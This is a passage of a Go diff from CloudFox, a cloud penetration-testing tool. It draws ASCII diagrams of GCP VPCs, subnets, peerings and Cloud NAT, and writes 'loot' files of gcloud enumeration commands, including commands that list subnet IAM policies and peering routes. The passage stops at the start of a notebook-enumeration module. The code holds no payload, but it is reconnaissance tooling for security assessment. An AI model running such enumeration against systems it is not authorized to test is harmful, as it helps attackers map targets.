sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┐ │\n") + + // VPC title line + titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel) + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine)) + + sb.WriteString("│ ├") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┤ │\n") + + // Get subnets for this network + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + // Group subnets by region + subnetsByRegion := make(map[string][]Subnet) + for _, s := range subnets { + subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s) + } + + // Sort regions + var regions []string + for region := range subnetsByRegion { + regions = append(regions, region) + } + sort.Strings(regions) + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)")) + } else { + // Draw subnets in a grid layout (3 per row) + subnetWidth := 26 + subnetsPerRow := 3 + + for i := 0; i < len(regions); i += subnetsPerRow { + // Draw subnet boxes for this row + endIdx := i + subnetsPerRow + if endIdx > len(regions) { + endIdx = len(regions) + } + rowRegions := regions[i:endIdx] + + // Top of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┐") + } + // Pad remaining space + remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - ((len(rowRegions) - 1) * 2) + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Region name line + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionDisplay := region + if len(regionDisplay) > subnetWidth-4 { + regionDisplay = regionDisplay[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay)) + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Separator + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┤") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Subnet details for each region + maxSubnets := 0 + for _, region := range rowRegions { + if len(subnetsByRegion[region]) > maxSubnets { + maxSubnets = len(subnetsByRegion[region]) + } + } + + for subnetIdx := 0; subnetIdx < maxSubnets; subnetIdx++ { + // Subnet name + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + name := s.Name + if len(name) > subnetWidth-4 { + name = name[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // CIDR + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Flags (PGA, Logs) + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + pga := "PGA:N" + if s.PrivateIPGoogleAccess { + pga = "PGA:Y" + } + logs := "Logs:N" + if s.FlowLogsEnabled { + logs = "Logs:Y" + } + flags := fmt.Sprintf("[%s][%s]", pga, logs) + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + + // Bottom of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┘") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + } + + // Check for Cloud NAT + nats := natsByNetwork[key] + if len(nats) > 0 { + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ │ ┌────────────────────────┐ │ │\n") + for _, nat := range nats { + natIPs := "AUTO" + if len(nat.NATIPAddresses) > 0 { + natIPs = strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 18 { + natIPs = natIPs[:15] + "..." + } + } + sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", nat.Name[:min(11, len(nat.Name))])) + sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", nat.Region[:min(13, len(nat.Region))])) + sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs)) + } + sb.WriteString("│ │ └───────────┬────────────┘ │ │\n") + sb.WriteString("│ │ │ │ │\n") + sb.WriteString("│ │ ▼ │ │\n") + sb.WriteString("│ │ [INTERNET] │ │\n") + } + + // VPC footer + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ └") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┘ │\n") + + return sb.String() +} + +// drawSharedVPCSection draws Shared VPC host/service relationships +func (m *NetworkTopologyModule) drawSharedVPCSection() string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for hostProject, config := range m.SharedVPCs { + sb.WriteString("│ │\n") + sb.WriteString(fmt.Sprintf("│ ┌─────────────────────────────┐ │\n")) + sb.WriteString(fmt.Sprintf("│ │ HOST PROJECT │ │\n")) + + hostDisplay := hostProject + if len(hostDisplay) > 27 { + hostDisplay = hostDisplay[:24] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay)) + sb.WriteString(fmt.Sprintf("│ └──────────────┬──────────────┘ │\n")) + sb.WriteString(fmt.Sprintf("│ │ │\n")) + + if len(config.ServiceProjects) > 0 { + // Draw connection lines + numProjects := len(config.ServiceProjects) + if numProjects > 6 { + numProjects = 6 // Limit display + } + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + if i == 0 { + sb.WriteString("┌") + } else if i == numProjects-1 { + sb.WriteString("┬") + } else { + sb.WriteString("┬") + } + sb.WriteString("────────────") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString("┬────────────") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("▼ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("┌──────────┐ ")) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ... ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("│%-10s│ ", proj)) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6)) + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("└──────────┘ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString(fmt.Sprintf("│ (Service Projects: %d total) │\n", len(config.ServiceProjects))) + } else { + sb.WriteString("│ │ │\n") + sb.WriteString("│ └── (No service projects found) │\n") + } + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawPeeringSummary draws a summary of all VPC peering relationships +func (m *NetworkTopologyModule) drawPeeringSummary(peerings []VPCPeering) string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + localNet := m.extractNetworkName(p.Network) + peerNet := m.extractNetworkName(p.PeerNetwork) + + // Truncate names if too long + if len(localNet) > 20 { + localNet = localNet[:17] + "..." + } + if len(peerNet) > 20 { + peerNet = peerNet[:17] + "..." + } + + stateIcon := "●" + if p.State != "ACTIVE" { + stateIcon = "○" + } + + importRoutes := "N" + if p.ImportCustomRoute { + importRoutes = "Y" + } + exportRoutes := "N" + if p.ExportCustomRoute { + exportRoutes = "Y" + } + + line := fmt.Sprintf("%s [%s] %s/%s ◄══════► %s/%s [Import:%s Export:%s]", + stateIcon, p.State[:min(6, len(p.State))], + p.ProjectID[:min(15, len(p.ProjectID))], localNet, + p.PeerProjectID[:min(15, len(p.PeerProjectID))], peerNet, + importRoutes, exportRoutes) + + if len(line) > width-4 { + line = line[:width-7] + "..." + } + + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawLegend draws the diagram legend +func (m *NetworkTopologyModule) drawLegend() string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "PGA = Private Google Access", "● = Active peering")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Logs = VPC Flow Logs enabled", "○ = Inactive peering")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "[SHARED VPC HOST] = Shared VPC host project", "◄══► = Peering connection")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Import/Export = Route exchange settings", "▼ = Traffic flow direction")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// min returns the minimum of two integers +func min(a, b int) int { + if a < b { + return a + } + return b +} + +// max returns the maximum of two integers +func max(a, b int) int { + if a > b { + return a + } + return b +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *NetworkTopologyModule) addNetworkToLoot(projectID string, n VPCNetwork) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# VPC NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List firewall rules for network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + n.Name, + n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addSubnetToLoot(projectID string, s Subnet) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SUBNET: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Region: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ + "# Get subnet IAM policy:\n"+ + "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", + s.Name, + s.ProjectID, s.Region, + s.Name, s.Region, s.ProjectID, + s.Name, s.Region, s.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addPeeringToLoot(projectID string, p VPCPeering) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# VPC PEERING: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Local: %s -> Peer: %s (project: %s)\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, + p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) +} + +func (m *NetworkTopologyModule) addNATToLoot(projectID string, nat CloudNATConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# CLOUD NAT: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Region: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, + nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addSharedVPCToLoot(projectID string, config *SharedVPCConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SHARED VPC HOST: %s\n"+ + "# =============================================================================\n"+ + "# Service Projects: %v\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", + projectID, + config.ServiceProjects, + projectID, + projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateASCIIDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + break // Only add once for flat output; hierarchical will duplicate + } + + // For hierarchical output, add to all projects so it appears in each + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *NetworkTopologyModule) getNetworksHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Network", + "Routing Mode", + "Subnets", + "Peerings", + "Shared VPC", + "MTU", + } +} + +func (m *NetworkTopologyModule) getSubnetsHeader() []string { + return []string{ + "Project", + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google Access", + "Flow Logs", + "Purpose", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *NetworkTopologyModule) getPeeringsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } +} + +func (m *NetworkTopologyModule) getNATHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "NAT IPs", + "Logging", + } +} + +func (m *NetworkTopologyModule) networksToTableBody(networks []VPCNetwork) [][]string { + var body [][]string + for _, n := range networks { + sharedVPC := "-" + if n.IsSharedVPC { + sharedVPC = n.SharedVPCRole + } + + body = append(body, []string{ + m.GetProjectName(n.ProjectID), + n.ProjectID, + n.Name, + n.RoutingMode, + fmt.Sprintf("%d", n.SubnetCount), + fmt.Sprintf("%d", n.PeeringCount), + sharedVPC, + fmt.Sprintf("%d", n.MTU), + }) + } + return body +} + +func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string { + var body [][]string + for _, s := range subnets { + purpose := s.Purpose + if purpose == "" { + purpose = "PRIVATE" + } + + if len(s.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range s.IAMBindings { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), + purpose, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), + purpose, + "-", + "-", + }) + } + } + return body +} + +func (m *NetworkTopologyModule) peeringsToTableBody(peerings []VPCPeering) [][]string { + var body [][]string + for _, p := range peerings { + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), + p.PeerProjectID, + p.State, + shared.BoolToYesNo(p.ImportCustomRoute), + shared.BoolToYesNo(p.ExportCustomRoute), + }) + } + return body +} + +func (m *NetworkTopologyModule) natsToTableBody(nats []CloudNATConfig) [][]string { + var body [][]string + for _, nat := range nats { + natIPs := strings.Join(nat.NATIPAddresses, ", ") + if natIPs == "" { + natIPs = "AUTO" + } + + body = append(body, []string{ + m.GetProjectName(nat.ProjectID), + nat.ProjectID, + nat.Name, + nat.Region, + m.extractNetworkName(nat.Network), + natIPs, + shared.BoolToYesNo(nat.EnableLogging), + }) + } + return body +} + +func (m *NetworkTopologyModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + for _, s := range subnets { + m.addSubnetToLoot(projectID, s) + } + } + + if peerings, ok := m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + + if nats, ok := m.ProjectNATs[projectID]; ok && len(nats) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloud-nat", + Header: m.getNATHeader(), + Body: m.natsToTableBody(nats), + }) + for _, nat := range nats { + m.addNATToLoot(projectID, nat) + } + } + + // Add Shared VPC loot if this is a host project + if config, ok := m.SharedVPCs[projectID]; ok { + m.addSharedVPCToLoot(projectID, config) + } + + return tableFiles +} + +func (m *NetworkTopologyModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectNATs { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = NetworkTopologyOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } +} + +func (m *NetworkTopologyModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + + sort.Slice(allNetworks, func(i, j int) bool { + if allNetworks[i].ProjectID != allNetworks[j].ProjectID { + return allNetworks[i].ProjectID < allNetworks[j].ProjectID + } + return allNetworks[i].Name < allNetworks[j].Name + }) + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) + } + + if len(allSubnets) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), + }) + } + + if len(allPeerings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), + }) + } + + if len(allNATs) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloud-nat", + Header: m.getNATHeader(), + Body: m.natsToTableBody(allNATs), + }) + } + + // Populate loot for flat output + for projectID, networks := range m.ProjectNetworks { + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + for projectID, subnets := range m.ProjectSubnets { + for _, s := range subnets { + m.addSubnetToLoot(projectID, s) + } + } + for projectID, peerings := range m.ProjectPeerings { + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + for projectID, nats := range m.ProjectNATs { + for _, nat := range nats { + m.addNATToLoot(projectID, nat) + } + } + for projectID, config := range m.SharedVPCs { + m.addSharedVPCToLoot(projectID, config) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := NetworkTopologyOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go new file mode 100644 index 00000000..26076d0b --- /dev/null +++ b/gcp/commands/notebooks.go @@ -0,0 +1,504 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNotebooksCommand = &cobra.Command{ + Use: globals.GCP_NOTEBOOKS_MODULE_NAME, + Aliases: []string{"nb", "jupyter", "workbench"}, + Short: "Enumerate Vertex AI Workbench notebooks", + Long: `Enumerate Vertex AI Workbench and legacy notebook instances. + +Features: +- Lists all notebook instances across locations +- Shows service account configuration +- Identifies public IP exposure +- Checks for GPU attachments +- Analyzes proxy access settings`, + Run: runGCPNotebooksCommand, +} + +type NotebooksModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]notebooksservice.NotebookInstanceInfo // projectID -> instances + ProjectRuntimes map[string][]notebooksservice.RuntimeInfo // projectID -> runtimes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results + mu sync.Mutex +} + +type NotebooksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NotebooksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NotebooksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NOTEBOOKS_MODULE_NAME) + if err != nil { + return + } + + module := &NotebooksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]notebooksservice.NotebookInstanceInfo), + ProjectRuntimes: make(map[string][]notebooksservice.RuntimeInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + if len(allInstances) == 0 && len(allRuntimes) == 0 { + logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) + return + } + + publicCount := 0 + for _, instance := range allInstances { + if !instance.NoPublicIP { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", + len(allInstances), publicCount, len(allRuntimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *NotebooksModule) getAllInstances() []notebooksservice.NotebookInstanceInfo { + var all []notebooksservice.NotebookInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *NotebooksModule) getAllRuntimes() []notebooksservice.RuntimeInfo { + var all []notebooksservice.RuntimeInfo + for _, runtimes := range m.ProjectRuntimes { + all = append(all, runtimes...) + } + return all +} + +func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + + svc := notebooksservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get instances + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, 